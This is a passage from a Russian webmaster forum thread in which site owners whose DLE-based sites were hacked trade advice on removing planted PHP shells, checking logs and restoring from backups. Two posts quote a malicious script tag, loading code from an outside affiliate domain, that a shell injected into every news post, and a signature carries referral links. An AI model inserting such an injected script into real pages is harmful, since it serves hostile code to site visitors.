Помогите! Взломали ФТП.

12
Fat Bear
На сайте с 01.12.2006
Offline
264
#11

Если пароль был спёрт однажды, на хост могли запросто засадить шелл и потом пароли можете менять хоть всю жизнь, толку не будет. Найти и удалить ВСЕ лишние файлы и папки. А в идеале - грохнуть всё под чистую и восстановить из бекапа.

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
ceomen
На сайте с 26.06.2009
Offline
97
#12

Я бы все-таки к логам серьезнее отнесся, и посмотрел как и откуда заходили и что делали.

Не всегда их трут, тем более если ломается ботами.

ceomen добавил 16.07.2010 в 12:33

Масол:
Если пароль был спёрт однажды, на хост могли запросто засадить шелл и потом пароли можете менять хоть всю жизнь, толку не будет. Найти и удалить ВСЕ лишние файлы и папки. А в идеале - грохнуть всё под чистую и восстановить из бекапа.

С этим абсолютно согласен!

[Удален]
#13

как уже сказали выше - заливают через шелл

хостинг? VDS?

если шелл у вас на хосте - поможет полный снос системы

если у вас хостинг и шелл где-то в руте - то либо тех.поддержка хостера, либо его смена

R
На сайте с 14.12.2007
Offline
148
#14

Та же самая ерунда творится, запихивают шелл видимо через какую-то дыру в дле8.5.

Вроде все вычистил, но появилась другая проблема, после этой заразы во всех новостях остался код

<script language="JavaScript" charset="windows-1251" src="http://protrafv2.com/js/if.php?id=1432"></script>

Именно его добавляет этот шелл(админы протрафа вы хде?🙅). Вопрос в том, как вычистить его из новостей, не редактируя каждую новость...🙅

porh
На сайте с 14.06.2006
Offline
169
#15

потёр.........

infin1ty
На сайте с 03.06.2009
Offline
169
#16

Афтор,вы не один, та же самая проблема была.

Короче говоря была Дле 7.5,потом поставил 8.5.Взломали обе.

Как я смог избавится от хакеров окончательно - снес всё на хосте,установил новую дле,всё подкрутил под неё.Далее поставил все фиксы которые нашел в интернете, уничтожил страницу восстановления пароля (через неё как-то ломают,похоже что хацкер зная данные бд,находит кэш этого запроса и составляет строчку которая ведет на страницу с новым паролем).Поставил ограничение по IP.

Как хакают - находят любую уязвимость,взламывают твой акк, настраивают скрипт на загрузку шеллов и грузит их.Проверял сайт во время взлома - везде шеллы php.Ограничивай, не ограничивай ФтП, всё равно заходят и меняют код.Вставляют в основном iframe коды с вирусом или как у вас Яву от партнерок.

Z5
На сайте с 10.12.2009
Offline
8
#17
Rifler:
Та же самая ерунда творится, запихивают шелл видимо через какую-то дыру в дле8.5.
Вроде все вычистил, но появилась другая проблема, после этой заразы во всех новостях остался код
<script language="JavaScript" charset="windows-1251" src="http://protrafv2.com/js/if.php?id=1432"></script>

Именно его добавляет этот шелл(админы протрафа вы хде?🙅). Вопрос в том, как вычистить его из новостей, не редактируя каждую новость...🙅

ППЦ, тоже самое лайно! как убрать ХЗ...😡

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий